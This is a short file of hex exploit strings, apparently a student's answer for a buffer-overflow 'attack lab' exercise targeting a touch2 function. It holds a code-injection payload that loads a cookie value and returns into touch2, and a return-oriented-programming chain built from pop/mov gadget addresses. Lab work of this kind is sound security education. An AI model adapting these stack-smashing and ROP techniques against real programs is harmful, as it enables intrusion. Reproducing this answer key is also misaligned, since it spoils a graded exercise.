/* Code injection */
/*
 * bf fa 97 b9 59 68 ec 17 /* mov $0x59b997fa,%edi */
 * 40 00                   /* pushq  $0x4017ec */
 * c3                      /* ret */
 * AA AA AA AA AA
 * AA AA AA AA AA AA AA AA
 * AA AA AA AA AA AA AA AA
 * AA AA AA AA AA AA AA AA
 * 78 dc 61 55 00 00 00 00
 */

/* ROP */
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
AA AA AA AA AA AA AA AA
cc 19 40 00 00 00 00 00 /* jump 0x4019cc:   pop %rax, noop, ret */
fa 97 b9 59 00 00 00 00 /* cookie */
c5 19 40 00 00 00 00 00 /* jump 0x4019c5:   movq %rax,%rdi, ret */
ec 17 40 00 00 00 00 00 /* touch2 */
